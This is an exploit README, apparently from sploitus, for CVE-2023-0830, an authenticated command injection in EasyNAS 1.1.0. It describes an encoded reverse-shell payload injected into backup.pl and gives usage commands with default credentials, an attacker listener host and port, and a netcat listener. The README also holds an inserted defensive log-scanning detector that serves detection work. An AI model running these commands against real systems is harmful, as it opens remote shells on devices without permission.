## https://sploitus.com/exploit?id=34AE7FD3-84D3-54C7-AF16-ADAFD46E2ABD
# CVE-2023-0830: EasyNAS 1.1.0 Authenticated OS Command Injection Exploit

This Python script exploits EasyNAS version 1.1.0 and adds extra functionality, including an integrated listener. The vulnerability is a command injection flaw that requires authentication.

The script establishes a session with the target server, then sends a login request with user-provided credentials. Upon successful authentication, it constructs a payload that, when executed, opens a reverse shell connection to a user-specified IP and port. This payload is URL- and Base64-encoded and then injected into the `backup.pl` script on the server via a crafted GET request.
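
A defender-side check for the request pattern described above, as an added example that is not part of the exploit or the original README: it scans web access-log lines for GET requests to `backup.pl` whose parameters carry shell metacharacters or Base64 that decodes to readable text. The log lines, the `/backup.pl` path prefix, the parameter name `p` and the harmless sample payload are constructed placeholders.

```python
import base64, binascii, re
from urllib.parse import parse_qsl, quote, urlsplit

# Constructed sample (not from the exploit): the path prefix, parameter name "p"
# and the harmless Base64-wrapped "echo" are placeholders for illustration.
_B64 = base64.b64encode(b"echo constructed-sample").decode()
_Q = quote("|echo " + _B64 + "|base64 -d|sh")
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Mar/2023:10:00:01 +0000] "GET /backup.pl?p=nightly HTTP/1.1" 200 512',
    f'192.0.2.66 - - [01/Mar/2023:10:05:42 +0000] "GET /backup.pl?p={_Q} HTTP/1.1" 200 0',
    '192.0.2.10 - - [01/Mar/2023:10:06:00 +0000] "GET /index.pl?p=%7Cls HTTP/1.1" 200 90',
]

REQ = re.compile(r'^(?P<ip>\S+) .*?"GET (?P<url>\S+) HTTP/[\d.]+"')
SHELL_META = re.compile(r"[|;&`$<>()\n]")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

def decoded_blobs(value):
    """Return printable ASCII text hidden in Base64-looking tokens of a value."""
    out = []
    for tok in B64_TOKEN.findall(value):
        try:
            raw = base64.b64decode(tok, validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid Base64 (bad padding or alphabet)
        text = raw.decode("ascii", "ignore")
        if raw and len(text) == len(raw) and text.isprintable():
            out.append(text)
    return out

def find_suspicious(lines, script="backup.pl"):
    """Flag GET requests to `script` whose URL-decoded parameters look like injection."""
    findings = []
    for line in lines:
        m = REQ.match(line)
        if not m:
            continue
        url = urlsplit(m["url"])
        if not url.path.endswith("/" + script):
            continue  # only the script named in the advisory is in scope here
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            meta = sorted(set(SHELL_META.findall(value)))
            blobs = decoded_blobs(value)
            if meta or blobs:
                findings.append({"ip": m["ip"], "param": name,
                                 "meta": meta, "decoded": blobs})
    return findings

if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG):
        print(finding)
```
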

## CVE: CVE-2023-0830

## Exploit Author
Ivan Spiridonov (xbz0n)
https://xbz0n.sh

## Vendor home page
[https://www.easynas.org](https://www.easynas.org)

## Features
- Integrated reverse shell listener - no need for a separate netcat process
- Automatic IP address detection for listener
- Option to use different shell types (bash, sh, python)
- Support for both HTTP and HTTPS
- Support for external listeners

## Usage

### Basic usage with integrated listener (recommended):
```bash
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin
```

### Using external listener (start `nc -lvnp 4444` first):
```bash
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin --mode reverse --lhost 192.168.0.100 --lport 4444
```

### Options:
```
--mode {shell,reverse}    Exploitation mode: shell (integrated reverse shell) or reverse (external listener)
--lhost IP_ADDRESS        IP address for the reverse shell listener (auto-detected by default)
--lport PORT              Port for the reverse shell listener (default: 4444)
--protocol {http,https}   Protocol to use (default: https)
--verbose                 Enable verbose output
--shell {bash,sh,python}  Specify the shell type to use with integrated listener (default: bash)
```

## Dependencies
- Python 3
- Requests library

## Disclaimer
This script is for educational purposes and authorized penetration testing only. Always seek explicit permission before running any penetration tests against a network or system.

Please use responsibly.